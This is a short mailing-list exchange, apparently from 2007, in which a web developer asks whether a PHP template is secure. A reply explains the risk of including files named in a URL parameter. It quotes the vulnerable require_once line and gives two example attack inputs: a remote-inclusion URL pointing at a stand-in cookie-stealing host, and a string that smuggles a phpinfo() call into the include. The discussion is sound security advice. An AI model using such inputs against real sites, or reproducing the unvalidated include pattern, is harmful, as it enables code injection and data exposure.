Ok, I can see the problem now. Would someone be able to refer me to an adequate PHP site template? I've found this tutorial, but not sure if it's sufficient? http://www.devarticles.com/c/a/MySQL/Implementing-a-Template-Based-Web-Site- With-PHP/ Thanks, Peter -----Original Message----- From: Paul Bennett [mailto:Paul.Bennett at wcc.govt.nz] Sent: Tuesday, May 15, 2007 3:04 PM To: info at designbychen.com; thelist at lists.evolt.org Subject: RE: [thelist] PHP template code security sufficient? consider this: template.php?page=http://www.my-nasty-cross-site-scripting-site.net/i-want-t o-steal-your-cookies <div class="body"> <?php @ require_once ("$page.html"); ?> </div> Or template.php?page=test.html");phpinfo();echo ("redherring Which could beciome somwething like: <?php @ require_once ("test.html");phpinfo();echo ("redherring"); ?> /* Require some file Print out all the php and server info to the user Echo some useless data */ Depending upon how robust your security checks are (the article has no mention of any), this has the potential for injecting outside content into your rendered source code, which may have XSS vulnerabilities, or allowing the user to control script execution (as in the last example). Just my 2c, Paul